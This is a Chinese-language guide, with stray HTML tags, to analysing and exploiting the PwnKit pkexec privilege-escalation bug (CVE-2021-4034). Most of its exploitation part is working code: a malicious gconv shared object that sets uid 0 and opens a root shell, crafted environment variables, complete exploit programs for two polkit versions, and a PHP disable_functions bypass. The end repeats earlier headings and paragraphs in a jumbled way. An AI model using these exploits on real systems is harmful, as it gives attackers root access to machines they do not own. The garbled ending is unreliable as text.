CVE-2021-4034 (PwnKit) 漏洞深入分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2021-4034 是 polkit 的 pkexec 工具中存在的一个本地提权漏洞，影响所有版本的 pkexec。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

背景知识<\/h2>

polkit 和 pkexec<\/h3>

polkit 是一个授权管理器，其系统架构由授权和身份验证代理组成<\/li>

pkexec 是 polkit 的一个工具，作用类似于 sudo，允许用户以另一个用户身份执行命令<\/li> <\/ul>

关键概念<\/h3>

SUID 位<\/strong>：pkexec 通常设置了 SUID 位，以 root 权限运行<\/li>
环境变量清理<\/strong>：Linux 的动态链接器会清除特权程序执行时的敏感环境变量<\/li>

字符集转换<\/strong>：glibc 的 iconv 函数族用于字符集转换<\/li> <\/ul>
漏洞原理分析<\/h2>
漏洞位置<\/h3>
漏洞位于 pkexec 的 main 函数中，涉及参数处理的逻辑错误。<\/p>
详细分析<\/h3>

参数处理缺陷<\/strong>：<\/p>

main 函数初始化 n=1<\/code>（534行）<\/li>
当不带参数运行 pkexec 时，argv[1]<\/code> 实际上越界访问了 envp[0]<\/code><\/li>
由于 main 函数的参数 argv<\/code> 和 envp<\/code> 在内存中相邻，argv[1]<\/code> 会指向 envp[0]<\/code><\/li> <\/ul> <\/li>
路径处理<\/strong>：<\/p> path<\/code> 被赋值为 envp[0]<\/code>（610行）<\/li> g_find_program_in_path(path)<\/code> 通过 PATH 环境变量查找程序绝对路径（632行）<\/li> argv[1]<\/code> 被赋值为绝对路径地址（639行），实际上是修改了 envp[0]<\/code><\/li> <\/ul> <\/li> 利用条件<\/strong>：<\/p> 攻击者可以控制 envp[0]<\/code>，从而写入任意环境变量<\/li> 关键是要找到一个可以利用的环境变量来引入外部 so 并执行其中的函数<\/li> <\/ul> <\/li> <\/ol> 环境变量保护机制绕过<\/h3> Linux 动态链接器会清除以下危险环境变量（定义在 unsecvars.h）：<\/p> GCONV_PATH<\/li> LD_PRELOAD<\/li> 其他能动态加载路径的环境变量<\/li> <\/ul> 直接通过 execve<\/code> 设置这些变量无效，因为它们会被清除。而此漏洞允许我们在清除后重新注入这些变量。<\/p> 利用技术<\/h2> 核心思路<\/h3> 通过漏洞注入 GCONV_PATH<\/code> 环境变量<\/li> 利用 g_printerr<\/code> 函数的字符集转换功能触发恶意代码执行<\/li> <\/ol> 利用步骤<\/h3> 伪造目录结构<\/strong>：<\/p> mkdir -p 'GCONV_PATH=.'<\/span>; <\/span><\/span>touch 'GCONV_PATH=.\/pwnkit'<\/span>; <\/span><\/span>chmod a+x 'GCONV_PATH=.\/pwnkit'<\/span> <\/span><\/span>mkdir -p pwnkit <\/span><\/span><\/code><\/pre><\/li> 创建 gconv-modules 文件<\/strong>：<\/p> module UTF-8\/\/ PWNKIT\/\/ pwnkit 1 <\/code><\/pre> 表示从 UTF-8 转换为 PWNKIT 编码使用 pwnkit.so，cost 值为 1（更高优先级）<\/p> <\/li> 编译恶意 so<\/strong>（pwnkit.c）：<\/p> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> gconv<\/span>() {} <\/span><\/span>void<\/span> gconv_init<\/span>() { <\/span><\/span> setuid(0<\/span>); setgid(0<\/span>); <\/span><\/span> seteuid(0<\/span>); setegid(0<\/span>); <\/span><\/span> system("export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; \/bin\/sh"<\/span>); <\/span><\/span> exit(0<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>编译命令：<\/p> gcc pwnkit\/pwnkit.c -o pwnkit\/pwnkit.so -shared -fPIC <\/span><\/span><\/code><\/pre><\/li> 构造恶意环境变量<\/strong>：<\/p> char<\/span> *<\/span>env[] =<\/span> { <\/span><\/span> "pwnkit"<\/span>, \/\/ 触发越界写，最终写入 GCONV_PATH=.\/pwnkit <\/span><\/span><\/span><\/span> "PATH=GCONV_PATH=."<\/span>, \/\/ 使 g_find_program_in_path 在 GCONV_PATH=. 目录中查找 <\/span><\/span><\/span><\/span> "CHARSET=PWNKIT"<\/span>, \/\/ 触发 g_printerr 更换编码字符 <\/span><\/span><\/span><\/span> "SHELL=pwnkit"<\/span>, \/\/ 触发调用 g_printerr 函数 <\/span><\/span><\/span><\/span> NULL <\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> 触发执行<\/strong>：<\/p> execve(".\/pkexec"<\/span>, (char<\/span>*<\/span>[]){NULL}, env); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 触发 g_printerr 的替代方法<\/h3> 除了 SHELL<\/code> 变量，还可以使用：<\/p> "XAUTHORITY=..\/xxx"<\/span> \/\/ 包含 ".." 触发验证错误 <\/span><\/span><\/span><\/code><\/pre>或<\/p> "LC_MESSAGES=en_US.UTF-8"<\/span> <\/span><\/span><\/code><\/pre>不同版本的差异处理<\/h2> 0.114+ 版本的挑战<\/h3> 在 0.114 及以上版本中，main 函数添加了 setenv<\/code> 调用，导致环境变量迁移到堆上，使得栈上的越界写失效。<\/p> 解决方案<\/h3> 在调用 setenv<\/code> 前预先设置该环境变量，防止重新分配：<\/p> "GIO_USE_VFS="<\/span>, \/\/ 预先设置，防止 envp 迁移 <\/span><\/span><\/span><\/code><\/pre>验证实验<\/h3> \/\/ t1.c <\/span><\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) { <\/span><\/span> char<\/span> *<\/span>a_argv[] =<\/span> { NULL }; <\/span><\/span> char<\/span> *<\/span>a_envp[] =<\/span> { <\/span><\/span> "env1=1"<\/span>, <\/span><\/span> "env2=2"<\/span>, <\/span><\/span> "env3=123456789"<\/span>, \/\/ 关键：预先设置 <\/span><\/span><\/span><\/span> "env4="<\/span>, <\/span><\/span> NULL <\/span><\/span> }; <\/span><\/span> execve(".\/t2"<\/span>, a_argv, a_envp); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ t2.c <\/span><\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>extern<\/span> char<\/span> **<\/span>environ; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) { <\/span><\/span> setenv("env3"<\/span>, "local"<\/span>, 1<\/span>); <\/span><\/span> printf("stack envp:<\/span>\n<\/span>"<\/span>); <\/span><\/span> printf("%p:%s<\/span>\n<\/span>"<\/span>, &<\/span>argv[1<\/span>], argv[1<\/span>]); <\/span><\/span> printf("%p:%s<\/span>\n<\/span>"<\/span>, &<\/span>argv[2<\/span>], argv[2<\/span>]); <\/span><\/span> printf("%p:%s<\/span>\n\n<\/span>"<\/span>, &<\/span>argv[3<\/span>], argv[3<\/span>]); <\/span><\/span> <\/span><\/span> char<\/span> **<\/span>var; <\/span><\/span> printf("real environ:<\/span>\n<\/span>"<\/span>); <\/span><\/span> for<\/span> (var =<\/span> environ; *<\/span>var !=<\/span> NULL; ++<\/span>var) <\/span><\/span> printf("%p:%s<\/span>\n<\/span>"<\/span>, var, *<\/span>var); <\/span><\/span>} <\/span><\/span><\/code><\/pre>PHP 绕过 disable_functions 的应用<\/h2> 利用原理：<\/p> PHP 的 iconv 函数调用 glibc 的 iconv 相关函数<\/li> 同样会使用 iconv_open<\/code>，受 GCONV_PATH<\/code> 影响<\/li> <\/ul> 利用方法：<\/p> 上传恶意 so 和 gconv-modules 到 \/tmp<\/li> 使用 PHP 代码触发： <?<\/span>php<\/span> <\/span><\/span>putenv<\/span>("GCONV_PATH=\/tmp\/"<\/span>); <\/span><\/span>iconv<\/span>("自定义字符集名"<\/span>, "UTF-8"<\/span>, "whatever"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 完整利用代码示例<\/h2> 针对 0.105 版本<\/h3> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>char<\/span> *<\/span>shell =<\/span> <\/span><\/span>"#include <stdio.h><\/span>\n<\/span>"<\/span> <\/span><\/span>"#include <stdlib.h><\/span>\n<\/span>"<\/span> <\/span><\/span>"#include <unistd.h><\/span>\n\n<\/span>"<\/span> <\/span><\/span>"void gconv() {}<\/span>\n<\/span>"<\/span> <\/span><\/span>"void gconv_init() {<\/span>\n<\/span>"<\/span> <\/span><\/span>" setuid(0); setgid(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>" seteuid(0); setegid(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>" system(<\/span>\"<\/span>export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin; \/bin\/sh<\/span>\"<\/span>);<\/span>\n<\/span>"<\/span> <\/span><\/span>" exit(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>"}"<\/span>; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) { <\/span><\/span> FILE *<\/span>fp; <\/span><\/span> system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=.\/pwnkit'; chmod a+x 'GCONV_PATH=.\/pwnkit'"<\/span>); <\/span><\/span> system("mkdir -p pwnkit; echo 'module UTF-8\/\/ PWNKIT\/\/ pwnkit 1' > pwnkit\/gconv-modules"<\/span>); <\/span><\/span> <\/span><\/span> fp =<\/span> fopen("pwnkit\/pwnkit.c"<\/span>, "w"<\/span>); <\/span><\/span> fprintf(fp, "%s"<\/span>, shell); <\/span><\/span> fclose(fp); <\/span><\/span> <\/span><\/span> system("gcc pwnkit\/pwnkit.c -o pwnkit\/pwnkit.so -shared -fPIC"<\/span>); <\/span><\/span> <\/span><\/span> char<\/span> *<\/span>env[] =<\/span> { <\/span><\/span> "pwnkit"<\/span>, <\/span><\/span> "PATH=GCONV_PATH=."<\/span>, <\/span><\/span> "CHARSET=PWNKIT"<\/span>, <\/span><\/span> "SHELL=pwnkit"<\/span>, <\/span><\/span> NULL <\/span><\/span> }; <\/span><\/span> <\/span><\/span> execve(".\/pkexec_105"<\/span>, (char<\/span>*<\/span>[]){NULL}, env); <\/span><\/span>} <\/span><\/span><\/code><\/pre>针对 0.115+ 版本<\/h3> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>char<\/span> *<\/span>shell =<\/span> <\/span><\/span>"#include <stdio.h><\/span>\n<\/span>"<\/span> <\/span><\/span>"#include <stdlib.h><\/span>\n<\/span>"<\/span> <\/span><\/span>"#include <unistd.h><\/span>\n\n<\/span>"<\/span> <\/span><\/span>"void gconv() {}<\/span>\n<\/span>"<\/span> <\/span><\/span>"void gconv_init() {<\/span>\n<\/span>"<\/span> <\/span><\/span>" setuid(0); setgid(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>" seteuid(0); setegid(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>" system(<\/span>\"<\/span>export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin; \/bin\/sh<\/span>\"<\/span>);<\/span>\n<\/span>"<\/span> <\/span><\/span>" exit(0);<\/span>\n<\/span>"<\/span> <\/span><\/span>"}"<\/span>; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> *<\/span>argv[]) { <\/span><\/span> FILE *<\/span>fp; <\/span><\/span> system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=.\/pwnkit'; chmod a+x 'GCONV_PATH=.\/pwnkit'"<\/span>); <\/span><\/span> system("mkdir -p pwnkit; echo 'module UTF-8\/\/ PWNKIT\/\/ pwnkit 1' > pwnkit\/gconv-modules"<\/span>); <\/span><\/span> <\/span><\/span> fp =<\/span> fopen("pwnkit\/pwnkit.c"<\/span>, "w"<\/span>); <\/span><\/span> fprintf(fp, "%s"<\/span>, shell); <\/span><\/span> fclose(fp); <\/span><\/span> <\/span><\/span> system("gcc pwnkit\/pwnkit.c -o pwnkit\/pwnkit.so -shared -fPIC"<\/span>); <\/span><\/span> <\/span><\/span> char<\/span> *<\/span>env[] =<\/span> { <\/span><\/span> "pwnkit"<\/span>, <\/span><\/span> "PATH=GCONV_PATH=."<\/span>, <\/span><\/span> "CHARSET=PWNKIT"<\/span>, <\/span><\/span> "GIO_USE_VFS="<\/span>, \/\/ 防止 envp 迁移 <\/span><\/span><\/span><\/span> "SHELL=pwnkit"<\/span>, <\/span><\/span> NULL <\/span><\/span> }; <\/span><\/span> <\/span><\/span> execve(".\/pkexec_115"<\/span>, (char<\/span>*<\/span>[]){NULL}, env); <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御措施<\/h2> 升级 polkit 到已修复版本<\/li> 移除 pkexec 的 SUID 位（可能影响功能）： chmod 0755<\/span> \/usr\/bin\/pkexec <\/span><\/span><\/code><\/pre><\/li> 监控对 gconv-modules 的异常修改<\/li> <\/ol> 总结<\/h2> CVE-2021-4034 是一个典型的由内存越界访问导致的权限提升漏洞，结合了环境变量注入和 glibc 字符集转换机制的特性。该漏洞的利用过程展示了：<\/p> 如何绕过 Linux 的安全机制（环境变量清理）<\/li> 利用程序逻辑错误实现内存越界写<\/li> 通过 glibc 特性触发恶意代码执行<\/li> 不同版本间的利用差异处理<\/li> <\/ol> 这个漏洞也意外地提供了 PHP 绕过 disable_functions 的新方法，展示了安全研究的横向思维。<\/p>

CVE-2021-4034 (PwnKit) 漏洞深入分析与利用指南<\/h1>

漏洞概述<\/h2> CVE-2021-4034 是 polkit 的 pkexec 工具中存在的一个本地提权漏洞，影响所有版本的 pkexec。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

背景知识<\/h2>

漏洞原理分析<\/h2>

漏洞位置<\/h3> 漏洞位于 pkexec 的 main 函数中，涉及参数处理的逻辑错误。<\/p>

不同版本的差异处理<\/h2>

0.114+ 版本的挑战<\/h3> 在 0.114 及以上版本中，main 函数添加了 setenv<\/code> 调用，导致环境变量迁移到堆上，使得栈上的越界写失效。<\/p>

完整利用代码示例<\/h2>

漏洞概述<\/h2>
CVE-2021-4034 是 polkit 的 pkexec 工具中存在的一个本地提权漏洞，影响所有版本的 pkexec。该漏洞允许低权限用户在默认配置下提升至 root 权限。<\/p>

漏洞位置<\/h3>
漏洞位于 pkexec 的 main 函数中，涉及参数处理的逻辑错误。<\/p>

0.114+ 版本的挑战<\/h3>
在 0.114 及以上版本中，main 函数添加了 `setenv<\/code> 调用，导致环境变量迁移到堆上，使得栈上的越界写失效。<\/p>`